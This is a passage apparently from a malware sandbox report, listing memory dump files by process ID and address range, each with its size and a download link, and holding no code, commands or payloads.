        • memory/1784-54-0x0000000000E00000-0x0000000002054000-memory.dmp

          Filesize

          18.3MB

          Download

        • memory/1896-70-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/1896-67-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/1896-68-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/2156-16-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2156-15-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2156-5-0x000001A4FE0B0000-0x000001A4FE0D2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2156-4-0x00007FF81EA33000-0x00007FF81EA35000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2156-19-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2156-22-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2248-71-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/2248-63-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/2248-75-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/4352-69-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/4352-66-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/4352-64-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/4352-62-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download